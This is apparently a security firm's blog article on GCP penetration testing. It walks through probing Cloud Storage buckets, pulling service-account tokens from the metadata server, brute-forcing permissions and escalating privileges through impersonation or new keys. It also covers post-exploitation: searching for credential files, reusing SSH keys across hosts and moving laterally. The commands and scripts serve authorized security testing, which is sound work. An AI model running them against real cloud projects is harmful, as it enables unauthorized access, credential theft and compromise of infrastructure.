GCP Penetration Testing: Methodology and Use Cases

Pentesting a GCP (Google Cloud Platform) infrastructure and the web applications deployed on it is a key step in identifying vulnerabilities and strengthening resilience against attacks.

This article presents the methodology adopted during a GCP infrastructure penetration test, the main types of tests performed, and some concrete examples.

Comprehensive Guide to GCP Pentesting

GCP Penetration Testing Methodology

During a web app security audit, a GCP environment can present itself in two main ways:

  • either the web server or application is hosted directly on GCP instances (Compute Engine, App Engine, Cloud Functions, etc.);
  • or the application relies on managed Google Cloud services such as Cloud CDN, Cloud SQL, Cloud Storage, etc.

In both cases, the success of the audit depends on specific knowledge that allows these different elements to be tested effectively.

In this section, we will review several common scenarios and propose a structured methodology based on practical experience.

Given the richness of the GCP ecosystem and the diversity of possible configurations, the approach presented here does not claim to cover all cases. Rather, it aims to provide a general framework that is flexible enough to be adapted to your context.

During a penetration test, it is common to encounter a Google Storage bucket:

  • either because files are stored and accessible via the web application,
  • or because the platform allows file uploads.

In this case, several approaches can be used to assess the security level of the bucket.

Public bucket

If the bucket is completely public, you can test access with a browser or with curl:

  • List the files:
https://storage.googleapis.com/<storage-name>/
  • Access a file directly:
https://storage.googleapis.com/<storage-name>/<path>/<file>
  • List the bucket’s IAM permissions:
https://www.googleapis.com/storage/v1/b/<storage-name>/iam
  • Brute force testing of associated permissions (even if the previous command fails):
https://www.googleapis.com/storage/v1/b/<storage-name>/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update
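The testPermissions URL above is tedious to assemble by hand. A small helper can generate it for any subset of candidate permissions — a minimal sketch (the function name is ours; the bucket name is a placeholder):

```shell
# Hypothetical helper: build the testPermissions brute-force URL for a given
# bucket and a list of candidate permissions
build_testperms_url() {
  local bucket="$1"; shift
  local url="https://www.googleapis.com/storage/v1/b/${bucket}/iam/testPermissions"
  local sep='?'
  local p
  for p in "$@"; do
    url="${url}${sep}permissions=${p}"
    sep='&'
  done
  printf '%s\n' "$url"
}

# Example: probe two object-level permissions anonymously
# curl -s "$(build_testperms_url <storage-name> storage.objects.get storage.objects.list)"
```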

Restricted anonymous access

In some cases, access is not public, but is still possible from any Google account. You will then need to test whether you can list or download content using a basic user account.

To do this, you need to initialise the CLI with a Google account:

gcloud auth list
gcloud config set account <your-email>

If you have never connected your user account to gcloud, you will need to do so using the following commands:

gcloud init
gcloud auth login --no-launch-browser

We will see later that it is also possible to use Service Accounts in the CLI (e.g. after a token theft). This can grant access to the bucket if the account in question has the necessary rights.

  • List the documents in the bucket:
gcloud storage ls gs://<storage-name>/
gcloud storage ls gs://<storage-name>/<directory>/

In this article, we mainly use the gcloud CLI. It is also possible to use gsutil, Google's legacy standalone tool for Cloud Storage. In some cases, we will also provide gsutil commands as examples.

gsutil ls gs://<storage-name>
gsutil ls gs://<storage-name>/<directory>/

  • Download a file:

gcloud storage cp gs://<storage-name>/<file> .

  • Check IAM permissions:

gsutil iam get gs://<storage-name>

Access to the bucket via a compromised Service Account

If you have a Service Account token with access to the bucket, you can initialise the CLI with this account and then reuse the same commands.

To do this, you need to initialise the CLI with the stolen token:

export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>

You can then query the bucket using the same commands listed in the previous section:

gsutil ls gs://<storage-name>
# etc.

Note that it is possible to check multiple buckets. If you have retrieved a list of buckets present on the GCP project, you can automate access verification:

while IFS= read -r i
do
  echo $i :
  gcloud storage ls gs://$i
done < ./storages.txt

On GCP, metadata servers can be accessed via the address 169.254.169.254 or the URL http://metadata.google.internal/.

These servers are consulted by GCP instances (e.g. a Compute Engine VM) in order to retrieve:

  • information about the instance (hostname, geographical area, etc.),
  • information about the associated GCP project,
  • and details about the Service Account (SA) used by the instance.

During a penetration test, the exploitation of this server allows useful, and sometimes sensitive, data to be collected.

Access to the metadata server

There are two main scenarios for querying this server:

  1. Exploiting an SSRF vulnerability: if the application has an SSRF, it is possible to hijack it to reach http://metadata.google.internal/.
  2. Access to a compromised machine: if you have access (RCE, SSH, etc.) to a GCP instance, you can send HTTP requests directly to the metadata server.

Since 2019, GCP requires the presence of the Metadata-Flavor: Google header to accept a request. This measure renders classic SSRFs ineffective, unless a CRLF injection allows the header to be added, which remains unlikely.

    Metadata exploitation

    If you have access to a Compute Engine instance (via RCE or shell), you can extract several useful pieces of information:

    # Hostname of the instance
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname"

    # Project ID
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/project/project-id"

    # Zone
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/zone"

    # Network interfaces
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"

    Service Accounts

    Service accounts are particularly sensitive: they allow attackers to exploit their privileges to access additional resources or move further into the infrastructure.

    • List the SAs available on the instance:
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"
    • Extract the token from the default SA:
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

    If several service accounts are configured, it is important to collect them all. It is also useful to check the scope associated with the service account:

    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"

    Note that one scope is critical: https://www.googleapis.com/auth/cloud-platform. It indicates that the account is not subject to any scope restriction and can authenticate against all GCP APIs.

    However, if the scope is limited (e.g. cloud-platform.read-only), privilege escalation will be required.
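Collecting every SA, its token, and its scopes can be automated from the instance. A minimal sketch (the metadata endpoints are those shown above; the loop logic is ours):

```shell
# Walk every service account exposed by the metadata server and dump its
# token and scopes (listing entries carry a trailing slash, e.g. "default/")
BASE="http://metadata.google.internal/computeMetadata/v1/instance/service-accounts"
for entry in $(curl -s -H "Metadata-Flavor: Google" "$BASE/"); do
  sa="${entry%/}"   # strip the trailing slash from each listing entry
  echo "== $sa =="
  curl -s -H "Metadata-Flavor: Google" "$BASE/$sa/token"
  curl -s -H "Metadata-Flavor: Google" "$BASE/$sa/scopes"
done
```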

    Startup scripts and Guest attributes

    Sensitive data may also be present in startup scripts or guest attributes:

    # Retrieve startup scripts
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text"

    # Retrieve guest attributes
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/guest-attributes/"

    For a more comprehensive list of metadata exploitation endpoints, please refer to the dedicated section on HackTricks.

    If you obtain a service account (via a token leak or RCE), you have a powerful lever for mapping and exploiting the GCP infrastructure.

    The testing methodology generally follows three steps:

    1. List the permissions associated with the service account
    2. Exploit these permissions:
      • either they allow privilege escalation (privesc),
      • or they allow sensitive data to be collected.
    3. Test access to specific resources (buckets, instances, other SAs).

    Listing permissions associated with the SA

    There is no native command to directly display all permissions for a service account. The solution is to brute force them, testing each permission one by one.

    Several public scripts facilitate this task. For example: test-permissions.py (Thunder-CTF)

    Before running the script, set the active project in your gcloud configuration:

    gcloud config set project <project-id>

    Then run the script with the service account token:

    python3 test-permissions.py $TOKEN

    The script returns a list of active permissions. Example:

    ['compute.addresses.list', 'compute.instances.list', 'compute.zones.list', 'iam.serviceAccounts.list', 'storage.buckets.list']

    The format may vary depending on the script, but the information obtained remains similar. This list will serve as a basis for exploitation.
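Once saved to a file (one permission per line), this list can be cross-checked against permissions known to enable privesc. A sketch with an illustrative, non-exhaustive shortlist (file names are ours; see the cheat sheet cited in the next section for a complete list):

```shell
# found-perms.txt: output of the brute-force script, one permission per line
printf '%s\n' compute.instances.list iam.serviceAccounts.list \
  storage.buckets.list iam.serviceAccounts.getAccessToken > found-perms.txt

# Non-exhaustive shortlist of privesc-capable permissions
cat > privesc-perms.txt <<'EOF'
iam.serviceAccounts.getAccessToken
iam.serviceAccounts.actAs
iam.serviceAccountKeys.create
iam.roles.update
deploymentmanager.deployments.create
EOF

# Any line printed here is an immediate privesc candidate
grep -xFf privesc-perms.txt found-perms.txt
```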

    Exploiting permissions

    To use the service account in the CLI, set its token:

    export CLOUDSDK_AUTH_ACCESS_TOKEN=$TOKEN

    All gcloud commands will then be executed with this account.

    Privesc (privilege escalation)

    As stated in the introduction to this section, there are two possible scenarios. In one case, one of the permissions can be used directly for privilege escalation. You can consult a dedicated cheat sheet to identify permissions that can be exploited for privilege escalation: HackTricks – GCP Privilege Escalation.

    Example: if the following permission appears in your results:

    iam.serviceAccounts.getAccessToken

    This permission allows you to obtain an access token for any service account. The documented exploitation is:

    gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" auth print-access-token

    This gives you direct access to the target account. If no permissions allow privesc, you can still use these permissions to access data.
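If you saved a list of service accounts earlier, the impersonation attempt can be scripted across all of them. A sketch (service-accounts.txt is a hypothetical file with one SA email per line; the helper name is ours):

```shell
# Build the documented impersonation command for a given SA email
impersonation_cmd() {
  printf 'gcloud --impersonate-service-account=%s auth print-access-token' "$1"
}

# Try every SA in the list; a printed token means the impersonation worked
if [ -f ./service-accounts.txt ]; then
  while IFS= read -r sa; do
    echo "== $sa =="
    $(impersonation_cmd "$sa") 2>/dev/null && echo "[+] impersonation works for $sa"
  done < ./service-accounts.txt
fi
```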

    Collecting data with available permissions

    If no critical permissions allow escalation, use those obtained to explore the infrastructure.

    Example with two permissions:

    gcloud iam service-accounts list

    Result: you obtain a list of existing service accounts on the project. This list could, for example, be used in the case of privesc presented above.

    gcloud storage buckets list

    Result: you will obtain a list of existing buckets (Google Storage) on the project, which you can then test.

    Note: Listing permissions are useful for mapping the cloud infrastructure. Whenever you can list a type of resource (for example, service accounts and buckets), save this list in a file.

    These lists will be very useful when you try to exploit other privileges or seek to access resources. It is this second point that we will now look at.

    Scoped permissions on resources

    The permissions listed above are generally defined at the project level. However, an account may also have specific rights to certain individual resources.

    Even without the necessary global permissions (such as iam.roles.list or iam.serviceAccounts.getIamPolicy), you can test your access by brute forcing the resources already identified.

    Let us look at a few examples:

    • Storage buckets: testing access to each bucket listed.
    while IFS= read -r i
    do
      echo $i :
      gcloud storage ls gs://$i
    done < ./storages.txt
    • Compute Engine instances: attempting SSH access.
    gcloud compute ssh --project=<project-id> --zone=<zone> <instance-name>

    Only instances with an external IP address are directly reachable from the Internet, but you can still test all of them:

    for i in $(gcloud compute instances list --format="value(name)"); do
      echo "Trying SSH on $i:"
      gcloud compute ssh --project=<project-id> --zone=<zone> "$i"
    done
    • Service Accounts and Key Management:

    If you were able to list the service accounts (iam.serviceAccounts.list), you can check whether keys exist:

    for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
      echo Looking for keys for $i:
      gcloud iam service-accounts keys list --iam-account $i
    done

    This does not allow you to collect the keys in question, but it is a good indication of which service account you could potentially generate a key for.

    You can then attempt to create a key:

    gcloud iam service-accounts keys create key.json --iam-account=<SA-name>@<project-name>.iam.gserviceaccount.com

    If this works, you can regain access to the SAs by importing the key into your CLI:

    gcloud auth activate-service-account --key-file=<file.json>
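Key enumeration and creation can likewise be chained over the full SA list. A sketch (service-accounts.txt is a hypothetical file with one SA email per line):

```shell
# For each SA, try to create a user-managed key; on success, activate it
if [ -f ./service-accounts.txt ]; then
  while IFS= read -r sa; do
    keyfile="key-${sa%%@*}.json"    # e.g. key-app-worker.json for app-worker@...
    if gcloud iam service-accounts keys create "$keyfile" --iam-account="$sa" 2>/dev/null; then
      echo "[+] key created for $sa"
      gcloud auth activate-service-account --key-file="$keyfile"
    fi
  done < ./service-accounts.txt
fi
```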

    Exploiting an instance: RCE and post-exploitation

    After examining the exploitation of a service account, let us now consider the scenario where you obtain direct access to an instance.

    This access can be obtained in various ways:

    • directly via SSH or a shell (including reverse shell),
    • indirectly via an RCE vulnerability.

    In all cases, post-exploitation actions follow a similar logic.

    Searching for useful or sensitive information

    As in any post-exploitation phase, start by searching for secrets, tokens, sensitive configuration files, or any information related to the network and instance.

    Some classic commands:

    cat /etc/hosts
    printenv
    ls /etc/ssh

    For a more comprehensive methodology, you can refer to dedicated cheat sheets: Linux Privilege Escalation Basics.

    For more comprehensive information, also search for content related to GCP:

    sudo find / -name "gcloud"
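The gcloud configuration directory and exported key files are frequent wins. A few hedged search commands (the paths are the gcloud defaults; adjust $HOME for each local user):

```shell
# Default gcloud credential store (credentials.db, access_tokens.db,
# legacy_credentials/, application_default_credentials.json)
ls -la ~/.config/gcloud/ 2>/dev/null
cat ~/.config/gcloud/application_default_credentials.json 2>/dev/null

# Exported service-account keys are JSON files containing a "private_key" field
grep -rl '"private_key"' /home /root 2>/dev/null || true
```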

    Finally, do not forget to query the metadata server (see dedicated section). Each compromised instance may offer new exploitable information via this channel.

    Internal network analysis

    From the compromised instance, map the internal network to identify other accessible machines and services.

    • Network scanning with Nmap
    • Potential targets: internal web services, SSH, Kubernetes clusters, etc.

    At this stage, all the classic techniques of an internal pentest can be applied to pivot, compromise other systems, or collect more data.

    Note: always test SSH connections, not only on the current instance, but also on those discovered via Nmap or listed with gcloud. Your instance may contain the SSH key used to connect to other machines.
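A sketch of this key-reuse check, assuming hosts.txt holds the internal IPs discovered via Nmap or gcloud (file names and the target user are ours):

```shell
# Collect private SSH keys readable on this instance
find /home /root -path "*/.ssh/id_*" ! -name "*.pub" 2>/dev/null > ./keys.txt || true

# Try each key against each discovered host, without ever prompting
# (connects as the current user; prepend user@ as needed)
if [ -s ./keys.txt ] && [ -f ./hosts.txt ]; then
  while IFS= read -r key; do
    while IFS= read -r host; do
      ssh -i "$key" -o BatchMode=yes -o ConnectTimeout=3 \
        -o StrictHostKeyChecking=no "$host" true 2>/dev/null \
        && echo "[+] $key works on $host"
    done < ./hosts.txt
  done < ./keys.txt
fi
```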

    Exploiting Service Accounts present on the instance

    Another area of exploitation involves directly using the service accounts available on the instance.

    • List available accounts:
    gcloud auth list
    • Switch to a specific account:
    gcloud config set account <account-email>
    • Extract an associated token:
    gcloud auth print-access-token

    You can then use these service accounts to follow the methodology presented in the section dedicated to their exploitation.

    Conclusion

    The exploitation of a GCP instance combines:

    • traditional post-exploitation on Linux (secret collection, system exploration, network scanning),
    • and cloud-specific exploitation (metadata, service accounts, GCP resources).

    Each access to an instance must therefore be considered as a potential pivot point to the entire cloud infrastructure.

    Author: Cédric CALLY–CABALLERO – Pentester @Vaadata